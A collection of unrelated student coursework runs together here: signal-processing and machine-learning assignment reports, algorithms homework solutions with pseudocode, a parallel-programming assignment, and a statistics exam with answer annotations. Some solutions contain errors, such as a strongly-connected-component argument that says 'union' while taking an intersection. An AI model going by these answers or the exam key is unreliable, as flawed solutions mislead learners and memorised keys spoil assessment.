Vikranth Udandarao 2022570 1. To compare the manual convolution with the result from np.convolve(), both were computed and plotted on the same graph. The manual convolution was performed using nested loops to apply the convolution sum directly, while np.convolve() used NumPy’s built-in convolution function, which is optimized for performance. In the plot, we differentiate the two methods by using distinct colors and line widths: the manual convolution is shown with a thicker blue line, and the np.convolve() result is depicted with a thinner red line. Both methods yield nearly identical results, which visually overlap on the plot, indicating that the manual approach correctly implements the convolution process.2.3. . Prominent Frequency Components: ○ The FFT magnitude spectrum clearly shows two primary peaks: ■ One at 5 Hz. ■ The second at 12 Hz. ○ These frequencies correspond exactly to the frequencies f1=5 Hz and f2=12 Hz that were used to construct the signal in the time domain. Amplitudes of the Peaks: ○ The peak at 5 Hz has a magnitude of approximately 32. This is consistent with the fact that the cosine term has an amplitude of 1. In the FFT, the magnitude of this peak is scaled by the number of samples NNN, which results in a larger peak. ○ The peak at 12 Hz has a magnitude of approximately 16. This corresponds to the second cosine term where the amplitude is 0.5. The FFT shows a peak half as large as the one at 5 Hz, which matches the expected amplitude scaling. Symmetry of the Spectrum: ○ The full FFT result (first plot) is symmetric around 0 Hz, with peaks appearing at both positive and negative frequencies. This is a direct consequence of the fact that the signal x[n]x[n]x[n] is real-valued, leading to conjugate symmetry in the frequency domain. ○ The second plot focuses on the positive frequencies, showing only the significant frequency components at 5 Hz and 12 Hz.4. …The Gaussian pulse x(t) is a smoothly varying signal in the time domain. Its magnitude spectrum, obtained through the Fast Fourier Transform (FFT), reveals several important characteristics about the frequency content of the pulse. Gaussian Shape in the Frequency Domain: a. The FFT of a Gaussian pulse results in another Gaussian-shaped magnitude spectrum in the frequency domain. This property arises because the Fourier Transform of a Gaussian function is also a Gaussian. The spectrum is centered at 0 Hz, reflecting that the pulse is a low-frequency signal with most of its energy concentrated around zero frequency. Dominance of Low-Frequency Components: b. The bell-shaped spectrum shows that the energy of the Gaussian pulse is primarily concentrated at low frequencies. The amplitude decreases rapidly as we move away from 0 Hz. This indicates that the Gaussian pulse is composed mainly of low-frequency components, which corresponds to its smooth and continuous nature in the time domain. Width of the Frequency Spectrum: c. The width of the magnitude spectrum depends on the parameter σsigmaσ, which controls the width of the Gaussian pulse in the time domain. In this case, with σ=0.1sigma = 0.1σ=0.1, the spectrum is relatively wide in the frequency domain. According to the time-frequency uncertainty principle, a narrower pulse in the time domain (small σsigmaσ) results in a broader frequency spectrum. d. If σsigmaσ were larger, the time-domain pulse would be wider, and the corresponding frequency spectrum would be narrower, concentrating more energy near 0 Hz. Interpretation of Frequency Components: e. The central peak around 0 Hz indicates the strong presence of DC (low-frequency) components, while the rapid decay of the spectrum indicates minimal contributions from higher frequencies. This reflects that the Gaussian pulse is smooth and doesn’t exhibit rapid changes, which would require higher frequency components. 5.FIR Filter (Finite Impulse Response) 1. Time Domain Behavior: ○ The FIR filter attenuates the high-frequency component at 100 Hz while retaining the 10 Hz component, as seen in the FIR-filtered signal plot. 2. Frequency Domain Behavior: ○ In the frequency domain, the 100 Hz component is clearly attenuated in the FFT of the FIR-filtered signal, while the 10 Hz component is preserved. However, the attenuation at 100 Hz is not complete, and some leakage is visible. ○ The frequency response of the FIR filter shows a gradual roll-off after the 50 Hz cutoff frequency, and as a result, the filter does not entirely remove components near the cutoff, which is a common issue in finite-length FIR filters. This makes the filtering less sharp than with an IIR filter. IIR Filter (Infinite Impulse Response) 1. Time Domain Behavior: ○ The IIR filter effectively removes the high-frequency 100 Hz component and retains the 10 Hz component with minimal distortion. Compared to the FIR filter, the IIR filter introduces significantly less delay and closely matches the low-frequency content of the original signal. ○ The IIR filter achieves this with fewer coefficients, making it computationally more efficient than the FIR filter. However, recursive IIR filters can introduce phase shifts, although using zero-phase filtering (filtfilt) here minimizes this issue. 2. Frequency Domain Behavior: ○ The FFT of the IIR-filtered signal shows complete suppression of the 100 Hz component, while the 10 Hz component is preserved cleanly, indicating the IIR filter’s sharper frequency cutoff. ○ The frequency response of the IIR filter shows a much steeper roll-off after 50 Hz, which results in better attenuation of higher frequencies compared to the FIR filter. The IIR filter performs better in suppressing unwanted frequencies while retaining the desired low-frequency components. Comparison of FIR and IIR Filters: 1. Attenuation Efficiency: ○ Both the FIR and IIR filters effectively suppress the high-frequency component at 100 Hz, but the IIR filter achieves sharper attenuation, as evidenced by the frequency response and FFT plots. ○ The FIR filter’s gradual roll-off leads to some residual presence of the 100 Hz component in the frequency spectrum, whereas the IIR filter eliminates it more effectively. 2. Delay and Phase Distortion: ○ The IIR filter, being recursive, introduces minimal delay while still suppressing the high-frequency content, making it more suitable for real-time applications that require lower latency. Phase distortion can be a concern in IIR filters, but the use of zero-phase filtering (filtfilt) avoids this. 3. Computational Efficiency: ○ The FIR filter requires more coefficients and thus more computational resources to achieve similar performance compared to the IIR filter. ○ The IIR filter is more computationally efficient, as it uses fewer coefficients to achieve a sharper cutoff and better attenuation of high frequencies.
This assignment has in total 55 base points and 10 extra points, and the cap is 55. Bonus questions are indicated using the ⋆ mark. Please specify the following information before submission: • Your Name: Yufeng Xu • Your NetID: yx3038 Problem 1: Infinite knapsack [10⋆ +15 pts] (a)⋆ Prove that in any optimal solution (n1,…,nm), the total number of copies of the items I2,…,Im included in the knapsack is at most wmax − 1, i.e., (b) Based on the conclusion of (a), design an algorithm Knapsack(m,W,(w1,v1),…,(wm,vm)) for infinite knapsack with running time ). For convenience, your algorithm only need to return the maximum value achieved. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. (Hint: According to (a), we know that, in an optimal solution, the total weight of the items ), and hence the item I1 occupies “most” space of the knapsack. Try to combine this observation with the O(mW)-time DP algorithm.) Solution. Please write down your solution to Problem 1 here. (a) We prove the problem by contradiction. Suppose there exists an optimal solution where . We denote these items as where n ≥ wmax, and for each , ∃i = 2,…,m such that wj′ = wi. There can be multiple wj′ s that are equal to the same wi. Now, we want to show that ∃1 ≤ l ≤ r ≤ n such that is a multiple of w1. Consider the sum of the first k wj′ s, denoted as . Assume Sk ≡ Rk(mod w1), where Rk = 0,1,…,w1−1. (i) if ∃k such that Rk = 0, then take is a multiple of w1. (ii) if ∄k such that Rk = 0, Rk can only take w1 − 1 possible values. Because n ≥ wmax ≥ w1 ≥ w1 − 1, by the Pigeon-hole Principle, ∃k1,k2 such that Rk1 = Rk2, hence take w1). Next, we can take 1 ≤ l ≤ r ≤ n such that . Therefore, we can replace with t w1’s, and the final value is going to be larger, which is contradictory to our assumption that the original solution is optimal. Therefore, , i.e., (b) We know from (a) that 1, hence . Consider the naive infinite knapsack algorithm. Let DP(i,w) represent the maximul value by choosing from items {i,i + 1,…,m} with total weight w. Because we can either take ni the i-th item or take none of them, DP(i,w)=max{DP(i + 1,w), vi+DP(i,w − wi)}. Because i = 1,2,…,m, w = 0,1,…,W, hence this algorithm is of time complexity O(nW). Now, with the conclusion from (a), we can limit the search space of w for i = 2,…,m to . Then, the global maximum is equal to maxw{DP(2,w . For items 2,…,m, given any total weight limit w, with the infinte knapsack problem, we can obtain the optimal solution that maximizes the total value of the items chosen. For the whole problem, we learned from (a) that the total weight of items 2,…,m ≤ wmax2. Therefore, we can limit the total for 2,…,m to wmax2 and simply take as many item 1 as possible for the weight limit we haven’t used. By using this method, we can obtain the correct optimal solution. Because the weight limit for item 2,…,m shrinks from , and it takes O(1) time to add item 1 to the partial solution, the time complexity of the revised algorithm is Below is the pseudocode: def KNAPSACK(m, W, I ): # I is a l i s t of (w, v ) ’ s I = sorted(I , key=lambda x : x . v / x .w) w max = max([ item .w for item in I ]) DP = [[0 for w in range(w max ∗∗ 2)] for idx in range(m + 1)] # m+1 is set to handle boundary cases for idx in range(m − 1 , 0 , −1): for w in range(w max ∗∗ 2 + 1): if w >= I [ idx ] .w: DP[ idx ] [w] = max( I [ idx ] . v + DP[ idx ] [w − I [ idx ] .w] , DP[ idx + 1][w]) else : DP[ idx ] [w] = DP[ idx + 1][w] ans = max([DP[ 1 ] [w] + floor ((W − w) / I [ 0 ] .w) ∗ I [ 0 ] . v ]) return ans Problem 2: Counting shortest paths [15 pts] Given an undirected graph G = (V,E) and a vertex s ∈ V , we want to know for every vertex t ∈ V , how many (distinct) shortest paths from s to t there are. This can be viewed as a generalization of the unique shortest-path problem. Design an algorithm Count(G,s) to solve this problem. The algorithm should return a list L that contains a pair (v,δv) for each vertex v of G, where δv is the number of shortest paths from s to v. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V | and m = |E|. A sample example. Suppose the input graph is G = (V,E) where V = {s,a,b,c,d,e} and E = {(a,b),(b,c),(c,d),(a,d),(s,a),(c,e)}; see the figure below. Then the algorithm Count(G,s) should return L = [(s,1),(a,1),(b,1),(c,2),(d,1),(e,2)]. (Hint: Exploit the BFS tree and extend the idea in the unique shortest-path problem.)Solution. Please write down your solution to Problem 2 here. We solve the problem by BFS. Consider a BFS tree of the graph, we view s as the root, and perform a level-order traversal. For each node, we count the number of it on that level as the number of shortest paths. For the neighbors of that node, if the number of shortest paths has not been counted for a neighbor, we append it to the queue that maintains the BFS tree, otherwise we just ignore it, because it must have been studied in a higher level, and the node’s appearance in the current level does not corresponds to a shortest path. The pseudocode is as follows: class Node: def i n i t ( s e l f ): s e l f . neighbors = [ ] def add neighbor ( self , other ): s e l f . neighbors . append( other ) other . neighbors . append( s e l f ) def COUNT(G, s ): (V, E) = G # V: l i s t of Node ; E: l i s t of tuples of 2 Nodes for edge in E: edge [ 0 ] . add neighbor ( edge [1]) cnt = {} queue = [ s ] while queue != [ ] : L = len(queue) print(L) for u in queue [ : L ] : cnt [u] = cnt . get (u, 0) + 1 print(u. neighbors ) for v in u. neighbors : if v not in cnt . keys (): queue . append(v) queue = queue [L : ] L = [( item [0] , item [1]) for item in cnt . items ()] return L This algorithm is correct because all the nodes that have the same shortest-path-length are on the same level of the BFS tree, so by counting the times a node appear in the shallowest level where it appears, we can count the number of shortest paths to the node. Because only the shortest path will be considered, each edge will be visited once and only once. The sum of the number of times each node is visited is O(m), therefore, this algorithm is O(m) (and consequently O(m + n)). Problem 3: Reaching the one [15 pts] Let n ≥ 3 be a given positive integer and we are going to play a game as follows. During the game, we have a number k which is initially equal to 2. In each round of the game, we are allowed to change the current number k to a new number in one of the following ways: • Type-A: Change k to (k + 1) mod n. • Type-B: Change k to a divisor of k that is greater than 1. • Type-C: Change k to k2 mod n. Note that the above three rules guarantee that our number k is always in the range {0,1,…,n−1} during the entire game. The game terminates when k becomes 1. Our goal is to finish the game in fewest rounds. For example, suppose n = 91 and we can play the game as follows. • Round 1: 2 =⇒ 3 using Type-A change. • Round 2: 3 =⇒ 9 using Type-C change. • Round 3: 9 =⇒ 81 using Type-C change. • Round 4: 81 =⇒ 27 using Type-B change. • Round 5: 27 =⇒ 1 using Type-C change. As you can verify, this is an optimal solution. Design an algorithm Game(n) which returns an optimal solution to the game as a list. So Game(91) should return [2,3,9,81,27,1] (or another solution with 5 rounds). Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(nlogn) time. (Hint: Formulate the problem as a graph problem with n vertices and O(nlogn) edges.) Solution. Please write down your solution to Problem 3 here. We construct a graph based on the problem setting: all the possible remainders of n: 0,1,…,n−1 are constructed as n vertices. For Type-A operation, we connect vertex k to vertex k+1 for k = 0,1,…,n−2, and connect n−1 to 0. For Type-B operation, we connect vertex k to all its divisors larger than 1. For Type-C operation, we connect vertex k to k2(mod n) for k = 2,…,n − 1. Next, we consider the total number of directed edges. For Type-A, the number of directed edges is n; for Type-B, the total number of edges is ; for Type-C, the total number of edges is n − 2. Therefore, the total number of directed edges 1) . By integral test, +1, where ). Therefore, )). Also, n is O(nlog(n)), hence the number of directed edges is O(nlog(n)). Next, we perform a BFS search on this graph G. We use a queue to maintain the BFS procedure. We first append the starting vertex 2 to the queue. Every time, for the first vertex in the queue, if it’s 1, we quit the BFS; otherwise we append all of its unvisited neighbors to the end of the queue, and mark the current vertex the previous vertex of all its neighbors (if a neighbor does not have a recorded previous vertex). This algorithm can always find the shortest path between 2 and 1, because the nearest vertex will always come to the head of the queue. So when 1 is visited, the path is guaranteed to be shortest. The time complexity of BFS is O(nlog(n)) because the total number of edges in the graph is O(nlog(n)), and each edge is visited at most once. The time needed to construct the graph is also O(nlog(n)) because each edge takes O(1) time to construct. Therefore, the overall complexity of the algorithm is O(nlog(n)). The pseudocode is given as follows: class Vertex : def i n i t ( self , val ): s e l f . val = val s e l f . neighbors = [ ] def add neighbor ( self , other ): s e l f . neighbors . append( other ) def GAME(n ): V = [ Vertex ( i ) for i in range(n )] # Type A edge for i in range(n − 1): V[ i ] . add neighbor (V[ i + 1]) # Type B edge for i in range(2 , n ): for j in range(2 ∗ i , n, i ): V[ j ] . add neighbor (V[ i ]) # Type C edge for i in range(2 , n ): if i ∗∗ 2 % n != i : V[ i ] . add neighbor (V[ i ∗∗ 2 % n ]) # BFS visited = [0 for i in range(n )] prev = [−1 for i in range(n )] queue = [2] while queue != [ ] : head = queue [0] queue = queue [ 1 : ] visited [ head ] = 1 if head == 1: break for n in V[ head ] . neighbors : if not visited [n. val ] : queue . append(n. val ) if prev [n. val ] == −1: prev [n. val ] = head sol = [1] while sol [−1] != −1: sol . append( prev [ sol [ −1]]) return sol [ −2:: −1] Problem 4: Finding a strongly connected component [10 pts] Given a directed graph G = (V,E) and a vertex s ∈ V , we want to compute the strongly connected component of G containing s. Design an algorithm SCC(G,s) which returns the set of vertices of G that lie in the same strongly connected component as s. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. Your algorithm should run in O(n + m) time, where n = |V | and m = |E|. (Hint: By definition, a vertex v is in the same strongly connected component as s iff v is reachable from s and s is reachable from v. We already know how to find the vertices reachable from s using DFS. Can you use a similar idea to compute the vertices from which s is reachable?) Solution. Please write down your solution to Problem 4 here. For each node u, we store all the nodes v that (u,v) ∈ E as its out-neighbors and all the nodes w that (w,u) ∈ E as its in-neighbors. Then we perform DFS based on out-neighbors to obtain all the nodes that s can reach, and DFS based on in-neighbors to obtain all the nodes that can reach s. Lastly, we take the intersection of the two results, so that we can obtain the set of points in the strongly connected components containing s. This algorithm is correct, as we know DFS can reach a point t iff it’s reachable from s. If we reverse the directions of all edges, and perform DFS again, a point t is reached iff ∃ a path consisting of reversed from s to t, i.e., ∃ a edge from t to s, s is reachable from t. By taking the union of the results obtained by the 2 DFS’s, a node t is kept iff it is reachable from s and it can reach s, i.e., it is strongly connected to s. The time complexity to process in-neighbors and out-neighbors is O(m). The time complexity of DFS is O(n + m). Therefore, the time complexity of the whole algorithm is O(n + m). The pseudocode is as follows: class Node: def i n i t ( self , val ): s e l f . val = val s e l f . neighbors = [ [ ] , [ ] ] # 0 for in , 1 for out def add neighbor ( self , other ): s e l f . neighbors [ 1 ] . append( other ) other . neighbors [ 0 ] . append( s e l f ) # add a edge from s e l f to other def SCC(G, s ): (V, E) = G for (u, v) in E: u. add neighbor (v) res = [ set () , set ()] # res [0] for a l l the nodes can be reached from s ; # res [1] for a l l the nodes that can reach s def DFS(u, direction = 0): # direction = 0 for in−neighbors , 1 for out−neighbors res [ direction ] . add(u) for v in u. neighbors [ direction ] : if v not in res [ direction ] : DFS(v , direction = direction ) DFS(s , 0) DFS(s , 1) ans = res [ 0 ] . intersection ( res [1])ans . remove( s ) return ans
CSC718 Operating Sys & Parallel Programming Homework 4 MPI, OpenMP, and GPU Programming Assignments Total: 100 points The homework assignment will be graded based on the following criteria: • Accuracy: 1) the solution meets specific requirements in the problem description; 2) the solution produces correct results; 2) the procedures adopted in the solution are technically sound. • Efficiency: efficiency will be one of the criteria when grading programing assignment. The solution should produce the desired results efficiently. • Effort/neatness: the solution includes excellent effort, and all relate work is shown neatly and organized well. Homework assignment feedback will be available through the DropBox folder on D2L. For all the programming assignments, you can choose any operating systems you want. I will usually provide C/C++ samples for the programming assignments. If you prefer to use other languages, e.g., Java, they are accepted too. A README.txt is required to submit any programming assignments. In the README.txt, you need to provide the following information: 1) How to compile your program? 2) How to run your program? 3) What is the average running time of your program? 4) What are the expected output results when I run your program? Zip all you source code, project files, supporting files, and README.txt and submit the all-in-one zip file together to the D2L Dropbox. If you have any questions about the homework, please let me know. (10 points) What are the strengths and limitations of GPU programing? (15 points) Among the four parallel frameworks, multithreaded programming, MPI programming, openMP programming, and GPU programming (e.g., CUDA), we discussed in the class, what will be the strategies you are going to use in general when selecting a parallel framework for your applications? (10 points) Benchmarking of a sequential program reveals that 95 percent of the execution time is spent inside functions that are amendable to parallelization. What is the maximum speed up we could expect from executing a parallel version of this program on 10 processors using Amdahl’s Law? The “acceptable” identifier must meet the following constraints:CSC718 Operating Sys & Parallel Programming • The identifier is a six-digit combination of the numerals 0-9 1. (15 points) Write a sequential program to count the different identifiers given these constraints. 2. (20 points) Convert the sequential program to an MPI parallel program. 3. (20 points) (choose only one: A or B, not both) A. Convert the sequential program to an openMP parallel program. B. Convert the sequential program to a GPU program using a parallel framework at your choice (e.g., CUDA, OpenCL, etc.) 4. (10 points) Benchmark the three programs based on your choice in 3). Problem 1 process/ 1 thread 2 processes / 2 threads 3 processes / 3 threads 4 processes / or 4 threads Program1.c (sequential) n/a n/a n/a Program2.c (MPI) Program3.c (openMP or CUDA)
CS771A Assignment 3The Boys Rajarshi Dutta Udvas Basak Shivam Pandey 200762 201056 200938 1 Question 1 The first part of the solution essentially uses a linear model named Elastic Regression, which takes into account both the effects of Ridge Regression Penalty – L2 loss and Lasso Regression Penalty – L1 loss. The objective/loss function of the model is represented below: C(w) = argmin(1) w where, • w′ = Weights multiplied with each of the features present in the dataset taken into account for the construction of the regression model. • α = constant that multiplies both the lasso and ridge penalties. • λ1 = Regularization parameter for the Ridge regression penalty. • λ2 = Regularization parameter for the Lasso regression penalty. During the regularization procedure, the λ1 parameter leads to the formation of a sparse model, whereas the quadratic section of the penalty makes the part of λ1 portion more stable to the path of regularization, decreases the number of variables to be selected thereby promoting the grouping effect. The grouping effect enables the variables to be easily identified by correlation leading to the enhancement of the sampling procedure. This method first finds the Ridge Regression coefficients and then conducts the second step by using a Lasso sort of shrinkage of the coefficients. Inorder to determine the best performing linear model, Randomized Search Cross Validation technique has been applied for efficient hyperparameter selection out of the following sets of hyperparameters of the model. Here grid is a dictionary that contains the different hyperparameters of the Elastic Net Regression model as keys and its values. grid = dict() grid[’alpha’] = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 0.0, 0.2, 1.0] grid[’l1_ratio’] = np.arange(0,1, 0.01) grid[’selection’] = [’cyclic’, ’random’] grid[’max_iter’] = [2, 10, 100, 1000] grid[’tol’] = [1e-4, 1e-3, 1e-5, 1e-2, 1e-1, 0.0] The Randomized Search Cross Validation returns the best estimator with the following hyperparameters ElasticNet(alpha=0.1, l1_ratio=0.62, selection=’random’, tol=0.001, warm_start=True) Preprint. Under review. The corresponding MAE score on the training data are 5.6248 (for the O3 levels) and 6.5136 (for the NO2 levels) respectively. 2 Question 2 A suitable non-linear model which can effectively fit on the given dataset is K Nearest Neighbour algorithm. The KNN can be both used as a classification and regression model, which essentially classifies unknown data points based on the distance with respect to k nearest data points. The model essentially works on two different kinds of distance parameters, namely Euclidean distance, Minkowski distance and the Manhattan distance. One strength of the KNN regression algorithm that we would like to draw attention to at this point is its ability to work well with non-linear relationships. In the case of regression tasks, the algorithm chooses the k nearest points based on the given distance parameter. It calculates the new point to be approximately equal to the average of these nearest points. Also here Distance-weighted k-nearest-neighbor rule should be such where that it varies with the distance between the sample and the considered neighbor in such a manner that the value decreases with increasing sample-to-neighbor distance. (2) Here, the optimal value of K has been calculated by plotting the Train MAE loss and Test MAE loss for the case of both O3 and NO2 sensor values. The MAE loss variation for different k values has been shown below.Figure 1: MAE loss variation for K values We find that the KNN Regressor provides the minimum Mean absolute error for a k value of 5. model = KNeighborsRegressor(n_neighbors=5, P = 1, algorithm=”auto” , n_jobs = -1) Some other models tested for the given regression problem includes Xgboost, Multi-layer Perceptron, Random Forest Regressor models. • XGBoost Regressor : XGBoost uses a combination of two techniques, gradient boosting and tree boosting, to improve the accuracy of the model. Gradient boosting involves minimizing the loss function mean absolute error by iteratively adding weak learners (e.g., decision trees) to the model. Tree boosting, on the other hand, involves optimizing the split points of the decision tree by minimizing the loss function. • Random Forest Regressor : The algorithm works by creating a large number of decision trees, each of which is trained on a subset of the data and a subset of the features. The 2 final prediction is then made by averaging the predictions of all the trees in the forest. Random forest regression also includes several regularization techniques to prevent overfitting and improve the generalization of the model. These techniques include maximum depth, minimum samples per leaf, and maximum features. • Arttifical Neural Network : The given neural network consists of 64 followed by 32 and 8 layers. The optimizer used is Adam, and the kernel initialisation is He uniform and the loss function used is Mean absolute Error loss. The Perceptron is backpropagated for around 100 epochs on the training data with a batch size of 64. Non-linear Models O3 MAE loss NO2 MAE loss K Neighbours Regressor 3.3284 2.3228 XGboost Regressor 5.1433 4.7230 Random Forest Regressor 6.0784 5.3145 MultiLayer Perceptron 4.8807 4.9178 Table 1: Stats of different non-linear models 3 Question 3 The code is available in the submit.py file. Code snippet is mentioned below: import numpy as np import pickle as pkl # Define your prediction method here # df is a dataframe containing timestamps, weather data and potentials def my_predict( df ): X = np.array(df.iloc[:, 1:]) # Load your model file model = pkl.load(open(“knn_model.pkl”, “rb”)) test_preds = np.transpose(model.predict(X)) # Make two sets of predictions, one for O3 and pred_o3, pred_no2 = test_preds[0], test_preds[1] # Return both sets of predictions return ( pred_o3, pred_no2 ) another for NO2 3
CS771A Assignment 2The Boys Rajarshi Dutta 200762 Udvas Basak 201056 Shivam Pandey 200938 1 Solution 1 1.1 TheoryFigure 1: Illustration of a working ID3 algorithm We have used the Iterative Dichotomizer decision tree algorithm which is considered one of the most robustly used algorithms for supervised machine learning classification tasks. The algorithm works by recursively partitioning the training data based on their attributes until the decision tree produces the purest splits (referred to as the leaves). ID3 uses a top-down greedy approach to build a decision tree. The tree is basically constructed from the top and the greedy approach means that at each iteration the best feature is selected to split the node. 1.2 Our approach The decision tree constructed to solve the given Wordle-Solvr problem consists of the following components: 1.2.1 process node • For the process node function, every non-root node present in the ID3 tree constructed is considered and passed through the get entropy function which calculates the index of the vocabulary that minimizes entropy the most or maximizes the Information Gain. This index can be used to access the most appropriate query that can be used at that step. Preprint. Under review. • All words from list all words list are extracted and reveal function helps to uncover the mask between the query and the required word which is stored in split dict as the key. The value of the split dict contains an array of indices that returns the given mask when queried. get entropy • The get entropy function iterates over all of the words present in that node (possible candidate queries) and passes the array to the function calc entropy which returns the entropy of the current node. • Another dictionary is maintained which given the mask, corresponds to a number of queries(which when queried with the word provides that particular mask). These values are used to calculate the sum of weighted entropy after splitting the node. • The difference of the weighted sum of entropies after splitting the node with the initialentropy calculated from the parent node gives us the information gain used to produce the best split out of all words. (1) where, V = possible values in Attribute A, S = set of examples X, Sv = subset where XA = V • Information gain indirectly describes the mutual information between the attribute and theclass of labels S. calc entropy • This function simply calculates the Shannon Entropy based on the formula where p represents the probability of each class label which can be produced by the corresponding split based on their attribute. E(p) = −p · log2(p) (2) 2 Solution 2 The entire algorithm has been implemented in the submit.py file. 2
Write your name and section number at the top right of this page: Class Section Number Bret 8:50 001 Sahifa 1:20 003 Miranda 9:55 004 Sahifa 3:30 005 Sahifa 8:50 006 Cameron 1:20 007 As you complete the exam, write your initials at the top right of each other page.If you need more room, there is a blank page at the end of the exam, or we can give you some scratch paper. Some multiple choice questions are “Select ONE” while others are “Select ALL that apply”. Pay attention to the question type and only mark one option if it says “Select ONE”. Fill in the circles completely. 1. A dataframe lions has 32 rows, each representing a unique lion. It has two numeric columns: age , each lion’s age in decimal years, and proportion.black , the percentage of that lion’s nose which is black. Finally, it has a logical column adult , which is TRUE if age is greater than 3 and FALSE otherwise. Consider the following code which attempts to make a scatter plot of age on the X axis vs. proportion.black on the y axis.Which of the following statements are true about errors in the above code? Select ALL that apply. fill = adult must be changed to color = adult to color the points differently. alpha = 0.5 must be moved outside of aes() , like size = 2 currently is. size = 2 must be moved within aes() , like alpha = 0.5 is. fill = adult must be moved to the aes() in the ggplot() call, not geom point() . 2. Using the same dataframe as Question 1, consider the following code which creates a new dataframe, lions summary .Which of the following statements are true about lions summary ? Select ALL that apply. lions summary has 2 rows. lions summary has 2 columns. (False: adult, averageAge, and averagePropBlack.) lions summary has a column called ‘adult‘. If there were any NA values in the age column of lions , all the values of averageAge in lions summary will be NA (Sneakily false: If there are only NA values in one category of adult, the other can still function!) 3. A random viewer’s ideal movie length, in minutes, is approximately X ∼ N(120,15). Actual movie lengths are given by Y ∼ N(143,19). (a) Which R code below calculates the probability that a random movie is shorter than the 40th percentile for ideal movie length? Select ONE. qnorm(0.4, 120, 15) %>% pnorm(143, 19) qnorm(0.4, 143, 19) %>% pnorm(120, 15) pnorm(0.4, 120, 15) %>% qnorm(143, 19) pnorm(0.4, 143, 19) %>% qnorm(120, 15) (b) What movie length y corresponds to a z-score of 1? Select ONE. 19143 124162 (143 + 19 = 162) 4. Your friend claims that a random variable, X, follows the following probability distribution:Which of the following are true about your friend’s claim? Select ONE. This distribution has negative values of x, therefore X is not a random variable. This distribution has negative values of P(X = x), therefore X is not a random variable. The area under this distribution is not 1, therefore X is not a random variable. X is a valid random variable. 5. Consider ordering a ”footlong” (12 inch) sub from Subway. Consider trying to estimate µ, the average length of the sub you receive when you order a 12 inch sub. You do this by ordering 40 footlong subs and measuring their lengths in inches. (What a great problem this is.) You observe that the average length of your 40 subs is 11.5 inches, and the standard deviation of their lengths is 0.4 inches. Consider testing H0 : µ = 12 vs. Hα : µ < 12. Write a numeric expression (only containing numbers and artihmetic symbols like + and ×) for the test statistic of this test. x¯ − µnull √ sx/ n Answer:6. The fictitious distribution of the number of children in a household (X) is given below. x 0 1 2 3 P(X = x) ? 0.4 0.25 0.15 (a) Which of the following statements about X is true? Select ONE. X is a discrete RV. X is a binomial RV. X is a continuous RV. X is a normal RV. (b) What value of P(X = 0) makes this a valid probability distribution? Select ONE. 0.1 0.15 0.2 0.25 (c) What is the median number of children per household? Select ONE. 0 1 2 Not enough infomration to determine 7. Data is collected on the duration each winter that a lake’s surface is frozen over a period of 103 consecutive years. The correlation coefficient between the variables is r = −0.4. The year variable has a mean ¯x = 1950 and a standard deviation sx = 30. The freeze duration variable has ¯y = 90 and a standard deviation sy = 17. Consider fitting a simple linear regression model to this data. Write a numerical expression (using only numbers and arithmetic symbols like + or ×) for the predicted freeze duration in the year 1890. No need to simplify. Answer: (1890 is two x standard deviations BELOW the mean of x, so our predicted value will be r * two y standard deviations below the mean of y.)* 90 + (−0.4) × (−2) × 17 *You could also take the long way:* and βˆ0 = 90 − βˆ1 ∗ 1950, so ˆy1 = βˆ0 + βˆ1 ∗ 1890 8. We continue to consider the lake freezing data from Problem 7. A 95% confidence interval for the freeze duration of the true regression line at x = 1890 has the form: yˆ1 ± c × SEC A 95% prediction interval for the duration that the lake was frozen in the single year 1890 has the form yˆ1 ± c × SEP where c is a critical value from some distribution and SEC, SEP are some positive values. Reminder: There are 103 years in the dataset. Which R code calculates the numeric critical value c? Select ONE. qnorm(0.95) qnorm(0.975) qt(0.95, 101) qt(0.975, 101) qt(0.95, 102) qt(0.975, 102) 9. Using the expressions from the previous problem, circle the true relationship between SEC and SEP and briefly explain why. SEC < SEP SEC = SEP SEC > SEP Answer: A confidence interval for the height of the regression line is narrower than a prediction interval for at the same x point; but they have the same center and critical value. Therefore, it must be that SEC < SEP. 10. Consider trying to estimate the proportion of UW-Madison undergraduate students who will graduate at the end of this semester, p. You ask 50 random students, and 7 of them will graduate at the end of the semester. Consider using this information to calculate a confidence interval for p. Which of the following statements are true? Select ALL that apply. If we were to calculate an Agresti-Coull confidence interval for p, its center would be (7 + 1)/(50 + 2). (False: It would be (7 + 2)/(50 + 4).) If we were to calculate a Wald confidence interval p, its center would be 7/50. The upper bound of the Agresti-Coull confidence interval would be greater than the upper bound of the Wald confidence interval. (it’s shifted towards 0.5) As we increase the confidence level of our interval towards 100%, our interval would widen and approach [0, 1]. 11. We are interested in comparing the proportions of individuals with bachelor degrees among of adult men aged 25 and older in the states of Minnesota and Wisconsin. Let pM and pW represent these two population proportions. In random samples of nM = 300 Minnesota men and nW = 400 Wisconsin men aged 25 and older, the numbers of individuals with bachelor degrees are xM = 90 and xW = 100. Without simplification, write a numerical expression using provided data for the standard error SEci used in a 95% confidence interval for pM − pW of the form (point estimate) ± zcrit × SEci when using the Agresti-Coull method. Answer: SEci 12. In the setting of the problem above, write a numerical expression using provided data for the standard error SEht of the test statistic Z: pˆM − pˆW Z = ∼ N(0,1) SEht Answer: SEht 13. Suppose that the test statistic from the previous problem has the value z = 1.47 and that the p-value from a two-sided test is 0.14. Which of the following statements are true? Select ALL that apply. The test is statistically significant at an α = 0.05 level. A 95% confidence interval for pM − pW will contain the value 0. ( insignificant p-value) 14. You ask a group of 30 people from Country A to each privately give you a random number between 1 and 1000. You then ask a group of 40 people from Country B to each privately give you a random number between 1 and 1000. Let µA be the true average value that all members of country A would give upon this request, and similarly for µB. You are interested in the quantity µA − µB. Which of the following statements are true about how to approach this problem through statistical inference? Select ONE. Two-sample means inference is impossible to conduct because the sample sizes are different. Two-sample means inference is impossible to conduct because the random variables are technically discrete. Two-sample inference is more appropriate than paired-sample inference in this case. Paired-sample inference is more appropriate than two-sample inference in this case. 15. Assume the correct value of the test statistic from problem 14 is -50. Which R code correctly calculates the p-value for this test? Select ONE. pt(-50, df = W) 2*pt(-50, df = W) 2*pt(abs(-50), df = W) 1 – pt(-50, df = W)
